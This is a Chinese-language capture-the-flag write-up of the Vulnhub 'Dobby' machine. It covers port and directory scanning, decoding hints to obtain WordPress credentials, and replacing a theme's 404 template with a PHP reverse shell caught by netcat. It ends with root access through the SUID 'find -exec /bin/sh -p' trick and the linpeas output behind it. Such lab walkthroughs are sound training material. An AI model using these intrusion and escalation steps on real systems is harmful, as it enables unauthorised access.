首页 > 其他分享 >Vulnhub 之Dobby靶机详细解题过程

Vulnhub 之Dobby靶机详细解题过程

时间:2022-11-18 11:13:53浏览次数:58  
标签:bin rwsr Dobby 2020 usr xr 靶机 root Vulnhub

Dobby

识别目标主机IP地址

──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ sudo netdiscover -i eth1

利用Kali Linux自带的netdiscover工具识别目标主机IP地址为192.168.56.186

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.186 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-17 20:22 EST
Nmap scan report for 192.168.56.186
Host is up (0.00055s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.46 ((Ubuntu))
|_http-title: Draco:dG9vIGVhc3kgbm8/IFBvdHRlcg==
|_http-server-header: Apache/2.4.46 (Ubuntu)
MAC Address: 08:00:27:85:C2:A7 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.99 seconds

从NMAP扫描结果看,目标主机只有一个开放端口80,运行HTTP服务,而且注意到title是一串经过base64编码后的字符串,先把它解码:

┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ echo "dG9vIGVhc3kgbm8/IFBvdHRlcg==" | base64 -d
too easy no? Potter

Potter不知道是不是用户名,先搁置一边。

Get Access

浏览器访问80端口,返回Apache默认页面(除了前面提到的title),但是页面源代码有注释:

<!--
     See: /alohomora
  -->

┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ curl http://192.168.56.186/alohomora/                                          
Draco's password is his house ;)

不管如何,先扫描一下有无目录:

┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ gobuster dir -u http://192.168.56.186 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.186
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/11/17 21:02:20 Starting gobuster in directory enumeration mode
===============================================================
/log                  (Status: 200) [Size: 45]
/server-status        (Status: 403) [Size: 279]
Progress: 218431 / 220561 (99.03%)===============================================================
2022/11/17 21:02:47 Finished
===============================================================


┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ curl http://192.168.56.186/log                                                 
pass:OjppbGlrZXNvY2tz

hint --> /DiagonAlley

这里出现了密码,而且给出另外一个提示,应该是目录,试一下:

浏览器访问该目录:

http://192.168.56.186/DiagonAlley/

从返回的页面明显可以知道这是一个wordpress站点,并且其中有篇博文很显眼,显然是编码过的,查了一下是brainfuck编码,解码出来是乱码,很奇怪。

再看能不能登录wordpress后台,用draco以及密码OjppbGlrZXNvY2登录,竟然认证失败,奇怪!

这个密码是不是也是编码过的,用base64解码后是: ::ilikesocks

但是用解码后的密码同样不能认证通过,可能这个线索不对。

前面提示draco的密码是他的房子house

Google查询draco's house name, 搜索结果指向Slytherin

看是否可以登录,可以成功登录,登录以后先修改语言为英文

接下来设法将shell.php脚本上传到wordpress后台

Appearance->Theme Editor->404 Tempelates, 成功将404页面的php代码更换为shell.php代码。

通过查查看页面源代码

<link rel='stylesheet' id='admin-bar-css'  href='http://192.168.56.186/DiagonAlley/wp-includes/css/admin-bar.min.css?ver=5.5.3' type='text/css' media='all' />
<link rel='stylesheet' id='wp-block-library-css'  href='http://192.168.56.186/DiagonAlley/wp-includes/css/dist/block-library/style.min.css?ver=5.5.3' type='text/css' media='all' />
<link rel='stylesheet' id='amphibious-bootstrap-grid-css'  href='http://192.168.56.186/DiagonAlley/wp-content/themes/amphibious/css/bootstrap-grid.css?ver=5.5.3' type='text/css' media='all' />
<link rel='stylesheet' id='font-awesome-5-css'  href='http://192.168.56.186/DiagonAlley/wp-content/themes/amphibious/css/fontawesome-all.css?ver=5.5.3' type='text/css' media='all' />
<link rel='stylesheet' id='amphibious-fonts-css'  href='https://fonts.googleapis.com/css?family=Poppins%3A400%2C400i%2C700%2C700i%7CRubik%3A400%2C400i%2C700%2C700i&#038;subset=latin%2Clatin-ext' type='text/css' media='all' />
<link rel='stylesheet' id='amphibious-style-css'  href='http://192.168.56.186/DiagonAlley/wp-content/themes/amphibious/style.css?ver=5.5.3' type='text/css' media='all' />

可以猜测404页面的位置为:

'http://192.168.56.186/DiagonAlley/wp-content/themes/amphibious

└─$ sudo nc -nlvp 5555
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.186] 38798
Linux HogWarts 5.8.0-26-generic #27-Ubuntu SMP Wed Oct 21 22:29:16 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 03:37:42 up  1:21,  0 users,  load average: 0.00, 0.00, 0.02
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@HogWarts:/$

在Kali Linux成功得到了目标主机反弹回的shell:

www-data@HogWarts:/home/dobby$ cat flag1.txt
cat flag1.txt
Command 'cat' not found, but can be installed with:
apt install coreutils
Please ask your administrator.
www-data@HogWarts:/home/dobby$ echo $PATH
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
www-data@HogWarts:/home/dobby$ which cat
which cat
www-data@HogWarts:/home/dobby$ ls
ls
Descargas   Escritorio  Música      Público  flag1.txt
Documentos  Imágenes    Plantillas  Vídeos   sudoers
www-data@HogWarts:/home/dobby$ more flag1.txt
more flag1.txt
"Harry potter this year should not go to the school of wizardry"

flag1{28327a4964cb391d74111a185a5047ad}
www-data@HogWarts:/home/dobby$

得到了user flag, 这里不能使用cat命令,所以改用More来显示

提权

将linpeas.sh脚本上传至目标主机的tmp目录,修改权限,并执行

不过前面咱们得到了另一个密码,不知道这个密码是不是dobby的密码,尝试一下再说

哈哈竟然是对的密码是ilikesocks


www-data@HogWarts:/tmp$ 

www-data@HogWarts:/tmp$ 

www-data@HogWarts:/tmp$ 

www-data@HogWarts:/tmp$ su - dobby
su - dobby
Password: OjppbGlrZXNvY2

su: Authentication failure
www-data@HogWarts:/tmp$ su - dobby
su - dobby
Password: ilikesocks

dobby@HogWarts:~$

查看linpeas.sh运行结果,发现find命令有SUID位,参考GTFOBINS网站给出的方法进行提权

                               ╔═══════════════════╗
═══════════════════════════════╣ Interesting Files ╠═══════════════════════════════                                                                                                                                                
                               ╚═══════════════════╝                                                                                                                                                                               
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid                                                                                                                                                   
strings Not Found                                                                                                                                                                                                                  
-rwsr-xr-x 1 root root 109K Oct  8  2020 /snap/snapd/9721/usr/lib/snapd/snap-confine  --->  Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)                                                                 
-rwsr-xr-x 1 root root 43K Mar  5  2020 /snap/core18/1885/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 63K Jun 28  2019 /snap/core18/1885/bin/ping
-rwsr-xr-x 1 root root 44K Mar 22  2019 /snap/core18/1885/bin/su
-rwsr-xr-x 1 root root 27K Mar  5  2020 /snap/core18/1885/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 75K Mar 22  2019 /snap/core18/1885/usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 44K Mar 22  2019 /snap/core18/1885/usr/bin/chsh
-rwsr-xr-x 1 root root 75K Mar 22  2019 /snap/core18/1885/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40K Mar 22  2019 /snap/core18/1885/usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 59K Mar 22  2019 /snap/core18/1885/usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 146K Jan 31  2020 /snap/core18/1885/usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-- 1 root systemd-network 42K Jun 11  2020 /snap/core18/1885/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 427K Mar  4  2019 /snap/core18/1885/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 43K Sep 16  2020 /snap/core18/1932/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 63K Jun 28  2019 /snap/core18/1932/bin/ping
-rwsr-xr-x 1 root root 44K Mar 22  2019 /snap/core18/1932/bin/su
-rwsr-xr-x 1 root root 27K Sep 16  2020 /snap/core18/1932/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 75K Mar 22  2019 /snap/core18/1932/usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 44K Mar 22  2019 /snap/core18/1932/usr/bin/chsh
-rwsr-xr-x 1 root root 75K Mar 22  2019 /snap/core18/1932/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40K Mar 22  2019 /snap/core18/1932/usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 59K Mar 22  2019 /snap/core18/1932/usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 146K Jan 31  2020 /snap/core18/1932/usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-- 1 root systemd-network 42K Jun 11  2020 /snap/core18/1932/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 427K Mar  4  2019 /snap/core18/1932/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 23K Aug  3  2020 /usr/libexec/polkit-agent-helper-1
-rwsr-xr-- 1 root sssd 92K Oct  6  2020 /usr/libexec/sssd/ldap_child (Unknown SUID binary!)
-rwsr-xr-- 1 root sssd 83K Oct  6  2020 /usr/libexec/sssd/p11_child (Unknown SUID binary!)
-rwsr-xr-- 1 root sssd 168K Oct  6  2020 /usr/libexec/sssd/krb5_child (Unknown SUID binary!)
-rwsr-xr-- 1 root sssd 31K Oct  6  2020 /usr/libexec/sssd/proxy_child (Unknown SUID binary!)
-rwsr-xr-- 1 root sssd 56K Oct  6  2020 /usr/libexec/sssd/selinux_child (Unknown SUID binary!)
-rwsr-xr-- 1 root dip 386K Jul 23  2020 /usr/sbin/pppd  --->  Apple_Mac_OSX_10.4.8(05-2007)
-rwsr-xr-x 1 root root 15K Sep 29  2020 /usr/bin/vmware-user-suid-wrapper
-rwsr-xr-x 1 root root 71K Aug 30  2020 /usr/bin/su
-rwsr-xr-x 1 root root 67K May 28  2020 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 179K Jul  8  2020 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 84K May 28  2020 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 47K Jul 24  2020 /usr/bin/base32
-rwsr-xr-x 1 root root 87K May 28  2020 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 313K Sep 30  2020 /usr/bin/find
-rwsr-xr-x 1 root root 31K Aug  3  2020 /usr/bin/pkexec  --->  Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
-rwsr-xr-x 1 root root 52K May 28  2020 /usr/bin/chsh
-rwsr-xr-x 1 root root 55K Aug 30  2020 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 39K Aug 30  2020 /usr/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 44K May 28  2020 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 39K Mar  7  2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 467K Jun  7  2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 131K Oct 19  2020 /usr/lib/snapd/snap-confine  --->  Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
-rwsr-xr-- 1 root messagebus 51K Sep 10  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-sr-x 1 root root 15K Oct  7  2020 /usr/lib/xorg/Xorg.wrap


dobby@HogWarts:/var/www/html/DiagonAlley$ ls -alh /usr/bin/find
ls -alh /usr/bin/find
-rwsr-xr-x 1 root root 313K sep 30  2020 /usr/bin/find
dobby@HogWarts:/var/www/html/DiagonAlley$ /usr/bin/find  . -exec /bin/sh -p \; -quit
<onAlley$ /usr/bin/find  . -exec /bin/sh -p \; -quit
# id
id
uid=1000(dobby) gid=1000(dobby) euid=0(root) grupos=1000(dobby),4(adm),24(cdrom),30(dip),46(plugdev),121(lpadmin),132(lxd),133(sambashare)
# cd /root
cd /root
# ls -alh
ls -alh
total 32K
drwx------  4 root root 4,0K nov  7  2020 .
drwxr-xr-x 20 root root 4,0K nov  7  2020 ..
-rw-------  1 root root  162 nov  7  2020 .bash_history
-rw-r--r--  1 root root 3,1K ago 14  2019 .bashrc
drwx------  2 root root 4,0K oct 22  2020 .cache
drwxr-xr-x  3 root root 4,0K nov  7  2020 .local
-rw-r--r--  1 root root  161 sep 16  2020 .profile
-rw-r--r--  1 root root 1,4K nov  7  2020 proof.txt
# cat proof.txt
cat proof.txt
/bin/sh: 4: cat: not found
# more proof.txt
more proof.txt
                                         _ __
        ___                             | '  \
   ___  \ /  ___         ,'\_           | .-. \        /|
   \ /  | |,'__ \  ,'\_  |   \          | | | |      ,' |_   /|
 _ | |  | |\/  \ \ |   \ | |\_|    _    | |_| |   _ '-. .-',' |_   _
// | |  | |____| | | |\_|| |__    //    |     | ,'_`. | | '-. .-',' `. ,'\_
\\_| |_,' .-, _  | | |   | |\ \  //    .| |\_/ | / \ || |   | | / |\  \|   \
 `-. .-'| |/ / | | | |   | | \ \//     |  |    | | | || |   | | | |_\ || |\_|
   | |  | || \_| | | |   /_\  \ /      | |`    | | | || |   | | | .---'| |
   | |  | |\___,_\ /_\ _      //       | |     | \_/ || |   | | | |  /\| |
   /_\  | |           //_____//       .||`      `._,' | |   | | \ `-' /| |
        /_\           `------'        \ |   AND        `.\  | |  `._,' /_\
                                       \|       THE          `.\
                                            _  _  _  _  __ _  __ _ /_
                                           (_`/ \|_)/ '|_ |_)|_ |_)(_
                                           ._)\_/| \\_,|__| \|__| \ _)
                                                           _ ___ _      _
                                                          (_` | / \|\ ||__
                                                          ._) | \_/| \||___


root{63a9f0ea7bb98050796b649e85481845!!}
#

成功拿到了Root flag.

标签:bin,rwsr,Dobby,2020,usr,xr,靶机,root,Vulnhub
From: https://www.cnblogs.com/jason-huawen/p/16902562.html

相关文章

  • vulnhub靶场OS-ByteSec
    0x000靶场描述难度:中级flag:2个flag第一个用户和第二个root学习:利用|中小企业|枚举|速记|权限提升联系:https://www.linkedin.com/in/rahulgehlaut/0x001靶场下载......
  • vulnhub靶场Trollcave
    0x000靶场描述Trollcave是一个易受攻击的VM,在Vulnhub和信息安全战争游戏的传统中。你从一个你一无所知的虚拟机开始-没有用户名,没有密码,只是你可以在网络上看到的东西......
  • Vulnhub之DevContainer 1靶机解题详细过程
    DevContainer1识别目标主机IP地址──(kali㉿kali)-[~/Vulnhub/DevContainer1]└─$sudonetdiscover-ieth1Currentlyscanning:192.168.59.0/16|ScreenVi......
  • vulnhub靶场DomDom
    0x000靶场描述你对PHP程序的理解程度如何?您对Linux错误配置有多熟悉?此图像将涵盖高级Web攻击、开箱即用的思维和最新的安全漏洞。此靶场没有flag,获取到root权限即......
  • vulnhub靶场CyNix
    0x000靶场描述级别:中级描述:这是一台Boot2Root机器。该机器与VirtualBox兼容,DHCP将自动分配一个IP。您必须查找并读取两个flag(user和root),它们分别存在于user.txt和......
  • vulnhub靶场Os-hackNos-2
    0x000靶场描述难度:简单到中级flag:2个flag第一个用户和第二个根学习:Web应用程序|枚举|密码破解0x001靶场下载https://www.vulnhub.com/entry/hacknos-os-hac......
  • vulnhub靶场Os-hackNos-3
    0x000靶场描述难度:中级flag:2个flag第一个用户和第二个root学习:Web应用程序|枚举|权限提升网站:www.hacknos.com联系我们:@rahul_gehlaut0x001靶场下载https......
  • vulnhub靶场之DEATHNOTE: 1
    准备:攻击机:虚拟机kali、本机win10。靶机:DEATHNOTE:1,网段地址我这里设置的桥接,所以与本机电脑在同一网段,下载地址:https://download.vulnhub.com/deathnote/Deathnote.ova......
  • Vulnhub Crossroads靶机解题详细过程
    Crossroads识别目标主机IP地址......
  • Vulnhub ColddboxEasy 靶机解题详细过程
    Colddbox识别目标主机IP地址──(kali㉿kali)-[~/Vulnhub/Colddbox]└─$sudonetdiscover-iethCurrentlyscanning:172.16.52.0/16|ScreenView:UniqueHo......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99